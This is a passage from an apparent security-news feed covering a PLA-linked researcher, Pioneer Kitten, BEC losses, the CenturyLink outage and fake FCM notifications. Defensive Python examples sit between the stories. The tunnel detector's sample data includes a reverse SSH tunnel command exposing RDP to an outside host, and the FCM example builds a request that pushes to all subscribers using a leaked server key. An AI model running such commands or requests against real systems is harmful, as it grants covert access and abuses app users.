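            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Leftmost label only. Assumption: a 'label.tld' shape; real code should use the
    Public Suffix List so that 'amazon.co.uk' is not split in the wrong place."""
    return domain.lower().strip().split(".")[0]


def classify(domain: str, brands: List[str] = BRANDS) -> Optional[Tuple[str, str]]:
    """Return (brand, technique) if the domain looks like a squat of a watched brand, else None."""
    label = registrable_label(domain)
    if label in brands:
        return None  # the genuine label (the TLD still needs checking separately)
    # Candidate spellings: hyphens removed, then digits removed too (walrmart44 -> walrmart).
    candidates: List[str] = []
    for cand in (label.replace("-", ""), re.sub(r"[^a-z]", "", label)):
        if cand and cand not in candidates:
            candidates.append(cand)
    # Stage 1: brand embedded in a longer label (amazon-india, samsungpr0mo).
    for b in brands:
        if b in label:
            return (b, "combosquatting")
    # Stage 2: exact single-edit typos of a brand.
    for b in brands:
        variants = squat_variants(b)
        for cand in candidates:
            if cand in variants:
                return (b, variants[cand])
    # Stage 3: anything else within two edits of a brand.
    for b in brands:
        for cand in candidates:
            if len(cand) >= 5 and edit_distance(cand, b) <= 2:
                return (b, "near-miss")
    return None


if __name__ == "__main__":
    for d in ["amazon-india.online", "walrmart44.com", "samsungpr0mo.online", "payp4l.com", "paypal.com"]:
        print(d, "->", classify(d))
```

Feed newly registered domains (for instance from a certificate transparency or zone-file feed) through `classify` and triage the hits; stage 1 is deliberately greedy and will flag legitimate names that merely contain a short brand label, so keep an allow-list beside it.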
A researcher at the University of California with ties to the People’s Liberation Army (PLA) has been arrested and charged after allegedly destroying evidence.
Chinese national Guan Lei, 29, of Alhambra, faces a maximum sentence of 20 years in a federal prison after being charged with deliberately destroying a hard drive in order to obstruct an FBI investigation.
Guan, who was in the US on a J-1 non-immigrant visa, was suspected of transferring software or technical data to China’s National University of Defense Technology (NUDT), and was also being investigated for apparently lying about his military ties on a 2018 visa application, and in interviews with officers.
He apparently later admitted to receiving military training and wearing military uniforms whilst at NUDT. That same university was placed on a US entity list after being “suspected of procuring US-origin items to develop supercomputers with nuclear explosive applications,” according to an affidavit.
It is also claimed that one of Guan’s faculty advisors at NUDT was also a lieutenant general in the PLA who developed computers used by the Chinese army and Air Force, as well as military weather forecasts and nuclear technology.
Guan is said to have been observed throwing a hard drive into a dumpster outside his apartment on July 25, shortly before attempting to board a flight to China.
According to the affidavit, the hard drive “was irreparably damaged and that all previous data associated with the hard drive appears to have been removed deliberately and by force.”
Guan refused a request by FBI officers to examine his laptop and was subsequently denied permission to board the plane.
The news comes amidst a US crackdown on Chinese students fuelled by suspicions that Beijing forces legitimate students to spy for their country and sneaks military operatives into the US as students to do the same.
In January, an indictment was issued for another former NUDT ‘student’, Yanqing Ye, who was subsequently found to be a PLA lieutenant, and Zaosong Zheng, who tried to smuggle biological research out of the US. Both were students in Boston.
A suspected Iranian state-backed group appears to have been moonlighting to drive additional income, according to a new report from CrowdStrike.
The security vendor claimed that the newly discovered Pioneer Kitten has been active since at least 2017 and is mainly focused on stealing intelligence which would be strategically useful to Tehran.
However, it is more likely to be a contractor than directly government employed, according to CrowdStrike senior intelligence analyst, Alex Orleans. This is because there’s evidence that the group has recently been advertising its wares on underground forums, in particular, access to compromised networks.
“That activity is suggestive of a potential attempt at revenue stream diversification on the part of Pioneer Kitten, alongside its targeted intrusions in support of the Iranian government,” Orleans argued. Those state-directed intrusions mainly target healthcare, government, technology and defense firms.
The group itself is said to favor exploits of remote, internet-connected external services and open source tooling.
“The adversary is particularly interested in exploits related to VPNs and network appliances, including CVE-2019-11510, CVE-2019-19781, and most recently CVE-2020-5902; reliance on exploits such as these lends to an opportunistic operational model,” Orleans continued.
“Pioneer Kitten’s namesake operational characteristic is its reliance on SSH tunnelling, through open-source tools such as Ngrok and the adversary’s custom tool SSHMinion, for communication with implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP).”
The listed CVEs tie to bugs in Pulse Secure VPN appliances (CVE-2019-11510), Citrix ADC/Gateway (CVE-2019-19781) and F5 BIG-IP (CVE-2020-5902); the first two in particular were widely exploited earlier this year, notably in ransomware attacks.
Pioneer Kitten’s targets so far have been located mainly in North America and Israel, according to CrowdStrike. The group is also known by the monikers “Parasite,” “UNC757,” and “Fox Kitten.”
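The tradecraft Orleans describes, an SSH tunnel (Ngrok or a custom tool) carrying RDP for hands-on-keyboard work, leaves two host-side traces a defender can look for: the process that sets up the tunnel, and an RDP logon whose source address is the host's own loopback interface, because the session arrived through the local tunnel endpoint rather than from a peer on the network. The Python below is an added example, not CrowdStrike's code and not a signature for SSHMinion, which the report does not describe: it runs those two rules over constructed, simplified Sysmon process-creation and Windows 4624 logon events and then correlates them per host. Field names and the sample events are assumptions for the example.

```python
import re
from typing import Dict, List, Set

# Constructed sample telemetry (not real logs): simplified Sysmon process-creation
# events (event_id 1) and Windows logon events (event_id 4624) from two hosts.
SAMPLE_EVENTS: List[Dict] = [
    {"event_id": 1, "host": "ws01", "image": r"C:\Users\jdoe\AppData\Local\Temp\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    {"event_id": 1, "host": "ws01", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh -N -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"event_id": 4624, "host": "ws01", "logon_type": 10, "src_ip": "127.0.0.1", "user": "jdoe"},
    {"event_id": 4624, "host": "ws02", "logon_type": 10, "src_ip": "10.0.0.25", "user": "admin"},
    {"event_id": 1, "host": "ws02", "image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "cmdline": "ssh -T git@github.com"},
]

LOOPBACK = {"127.0.0.1", "::1"}
# ssh -R/-L/-D port forwarding that touches the RDP port, e.g. "-R 3389:127.0.0.1:3389".
SSH_FORWARD_RDP = re.compile(r"(?:^|\s)-[RLD]\s*\S*3389")


def rule_tunnel_setup(ev: Dict) -> bool:
    """Process creation that establishes a tunnel able to carry RDP."""
    if ev.get("event_id") != 1:
        return False
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    if "ngrok" in image or "ngrok" in cmd.lower():
        return True
    return image.endswith("ssh.exe") and bool(SSH_FORWARD_RDP.search(cmd))


def rule_rdp_from_loopback(ev: Dict) -> bool:
    """Logon type 10 (RemoteInteractive, i.e. RDP) whose source is the host itself:
    the session came in through a local tunnel endpoint, not from the network."""
    return (ev.get("event_id") == 4624 and ev.get("logon_type") == 10
            and ev.get("src_ip") in LOOPBACK)


def detect(events: List[Dict]) -> List[Dict]:
    """Apply both rules and return one alert per matching event."""
    alerts: List[Dict] = []
    for ev in events:
        if rule_tunnel_setup(ev):
            alerts.append({"host": ev["host"], "rule": "tunnel_setup", "detail": ev.get("cmdline", "")})
        if rule_rdp_from_loopback(ev):
            alerts.append({"host": ev["host"], "rule": "rdp_from_loopback", "detail": ev.get("user", "")})
    return alerts


def correlate(alerts: List[Dict]) -> Set[str]:
    """Hosts showing both behaviours: tunnel established and RDP logon via loopback."""
    by_host: Dict[str, Set[str]] = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return {h for h, rules in by_host.items() if {"tunnel_setup", "rdp_from_loopback"} <= rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("hosts with tunnel + loopback RDP:", correlate(found))
```

Either rule alone produces noise (developers run ssh.exe, and some remote-support tools also log loopback RDP), so the per-host correlation is the alert worth paging on; the individual rule hits are context for the investigation.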
Wire transfer losses from Business Email Compromise (BEC) have soared by over 48% from the previous quarter to hit an average of more than $80,000, according to Agari.
The security vendor’s findings were revealed in the latest Phishing Activity Trends Report from the Anti Phishing Working Group (APWG).
Agari noted that BEC losses involved in bank transfer attacks jumped significantly from the $54,000 recorded in the first quarter, although these accounted for just 18% of total attacks.
Gift cards were the most popular way for scammers to monetize attacks, with BEC attackers requesting these in two-thirds (66%) of raids. Cards from eBay, Google Play, Apple iTunes, and Steam Wallet accounted for the majority (70%) of these.
However, gift card scams don’t net attackers much: the average amount requested by scammers dropped from $1,453 in the first quarter of 2020 to $1,213. Just 16% of BEC attacks were recorded as requesting “payroll diversions,” down from 25% in Q3 2019.
Despite the majority of attacks targeting users with fairly modest requests for money, some groups are continuing to push the boundaries.
One Russian cybercrime group known as Cosmic Lynx demands an average of nearly $1.3 million per BEC attack, according to Agari. As previously reported by Infosecurity, the group has been involved in over 200 BEC campaigns since July 2019, targeting executives in 46 countries.
Agari has in the past also warned of BEC gangs from West Africa operating highly sophisticated campaigns.
According to the FBI’s annual report, BEC continued to be the biggest money-maker for cyber-criminals last year, accounting for over half of all losses to cybercrime.
BEC scammers made almost $1.8 billion in 2019, over half the $3.5 billion total, according to the FBI’s 2019 Internet Crime Report. That’s up from around $1.3bn and a total of $2.7bn in 2018.
The final game in yesterday's online Chess Olympiad was declared a draw after a widespread internet outage interrupted play.
An issue at internet service provider CenturyLink has been blamed for global connectivity problems that disrupted the tournament and caused issues for Cloudflare, Hulu, Reddit, EA, Steam, the PlayStation Network, Xbox Live, Feedly, Discord, and dozens of other services on Sunday morning.
Competing chess teams from India and Russia had been battling it out for victory after a 3–3 tie in the first round when the outage struck. Two of the Indian players, Nihal Sarin and Divya Deshmukh, lost connection toward the end of the game, subsequently losing on time.
A spokesperson for the Olympiad said: "It is very unfortunate that technical difficulties got in the way of the final. Until that moment, the match between India and Russia had been one of the most thrilling and balanced seen at the 2020 Online Chess Olympiad."
The Russians were initially declared the winner of the competition, but the Indian team lodged an appeal.
"The Appeals Committee examined all the evidence provided by Chess.com, as well as information gathered from other sources about the Cloudflare crash that caused the outage. After being informed of their considerations and in absence of a unanimous verdict, the FIDE President made the decision to award Gold Medals to both teams," said the spokesperson.
The shared victory represents India's first ever win in a Chess Olympiad and Russia's first victory since 2002.
The historic tournament, which nowadays is battled out every two years, has been running since 1927.
In a message shared on Twitter on Sunday morning, Cloudflare said it was "aware of network related issues caused by a third-party transit provider incident" and was "working to mitigate the problem."
"Today we saw a widespread Internet outage online that impacted multiple providers," said John Graham-Cumming, Cloudflare CTO. "Cloudflare's automated systems detected the problem and routed around them, but the extent of the problem required manual intervention as well."
CenturyLink confirmed to CNN that an IP outage impacting content delivery networks (CDNs) had occurred on Sunday morning. The company said that all services had been restored by 11:12 am ET.
Google Android users were pestered last week by a series of fake notifications popping up on their devices.
According to Paul Ducklin of Sophos' Naked Security, the string of phony popups first became an annoyance for users of the Google Hangouts app before bothering users of Microsoft Teams.
"Users all over the world, and therefore at all times of day (many users complained of being woken up unnecessarily), received spammy looking messages," wrote Ducklin in a blog post published on August 28.
"To be clear, it wasn’t Microsoft testing notifications in the Teams app for Android. The bogus alerts caught the software giant off guard, too."
From their content, the notifications don't appear to be malicious or criminal in intent. No dubious links or calls to action were included, with messages simply stating the header "FCM Messages" followed by the text "Test Notification!!!!"
Pondering the identity of the sender and their motive, Ducklin commented: "The messages did indeed look like some sort of test—but by whom, and for what purpose?
"The four exclamation points suggested someone of a hackerish persuasion—perhaps some sort of overcooked 'proof of concept' (PoC) aimed at making a point, sent out by someone who lacked the social grace or the legalistic sensitivity of knowing when to stop."
Ducklin suggests that the spate of fake notifications may be connected to a recent discovery made by a cybersecurity researcher and bug bounty hunter who goes by “Abbs.” On August 17, Abbs claimed to have earned $30K for identifying a coding vulnerability in numerous Android apps that could enable someone to hijack the Firebase Cloud Messaging (FCM) service.
Describing the weakness, Abbs exclaimed: "A malicious attacker could control the content of push notifications to any application that runs the FCM SDK and has its FCM server key exposed, and at the same time send these notifications to every single user of the vulnerable application!
"These notifications could contain anything the attacker wants including graphic/disturbing images (via the 'image': 'url-to-image' attribute) accompanied with any demeaning or politically inclined message in the notification!"
The author of the notifications, which were promptly halted by Google and Microsoft, has yet to be identified.
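The weakness Abbs describes is a secret-handling mistake: the legacy FCM server key, which authorizes sending to every subscriber of an app, shipped inside the app itself, where anyone can read it out of the APK. The Python below is an added example, not code from Abbs, Sophos, Google or Microsoft: it scans a constructed strings dump for anything shaped like a legacy server key, and assembles (without sending) the legacy FCM send request that such a key authorizes, including the `image` attribute and the `dry_run` flag that lets FCM validate the request without delivering it. The key-shape regex and the sample strings are assumptions for the example; the legacy endpoint, the `Authorization: key=` header and `dry_run` are the documented legacy HTTP API.

```python
import json
import re
from typing import Dict, List, Optional

# Legacy FCM HTTP endpoint; the server key is sent as "Authorization: key=<server key>".
FCM_LEGACY_SEND = "https://fcm.googleapis.com/fcm/send"

# Heuristic shape of a legacy FCM server key (assumption for this example:
# "AAAA", 7 URL-safe chars, ":", then 140 URL-safe chars).
SERVER_KEY_RE = re.compile(
    r"(?<![A-Za-z0-9_-])AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140}(?![A-Za-z0-9_-])"
)

# Constructed strings dump from a decompiled build. The google_api_key (AIza...) is the
# client-side key every app legitimately ships; the server key must never appear here.
SAMPLE_KEY = "AAAAabcdefg:APA91b" + "x" * 134
SAMPLE_STRINGS = f"""
<string name="google_api_key">AIzaSyD-constructed-client-key-0000000000000</string>
<string name="fcm_server_key">{SAMPLE_KEY}</string>
<string name="gcm_defaultSenderId">123456789012</string>
"""


def find_fcm_server_keys(text: str) -> List[str]:
    """Return distinct candidate legacy server keys found in a strings/resources dump."""
    return sorted(set(SERVER_KEY_RE.findall(text)))


def build_legacy_request(server_key: str, to: str, title: str, body: str,
                         image: Optional[str] = None, dry_run: bool = True) -> Dict:
    """Assemble, but do not send, a legacy FCM send request.

    With dry_run=True FCM validates the request and the key without delivering
    anything, which is how to confirm a leaked key is live without pushing a
    notification to real users. Sending to "/topics/<name>" reaches every
    subscriber of that topic, which is what makes a leaked key mass-reach."""
    notification: Dict[str, str] = {"title": title, "body": body}
    if image:
        notification["image"] = image   # the attribute Abbs' write-up highlights
    message: Dict = {"to": to, "notification": notification}
    if dry_run:
        message["dry_run"] = True
    return {
        "url": FCM_LEGACY_SEND,
        "headers": {"Authorization": f"key={server_key}",
                    "Content-Type": "application/json"},
        "body": json.dumps(message),
    }


if __name__ == "__main__":
    for key in find_fcm_server_keys(SAMPLE_STRINGS):
        req = build_legacy_request(key, to="/topics/all",
                                   title="FCM Messages", body="Test Notification!!!!")
        print("candidate server key found:", key[:16] + "...")
        print(req["url"], req["headers"]["Authorization"][:12] + "...", req["body"])
```

Run `find_fcm_server_keys` over the output of `strings` or `apktool` on your own release builds as a pipeline gate; a hit means the key must be rotated in the Firebase console, not just removed from the next build, because every APK already distributed still carries it.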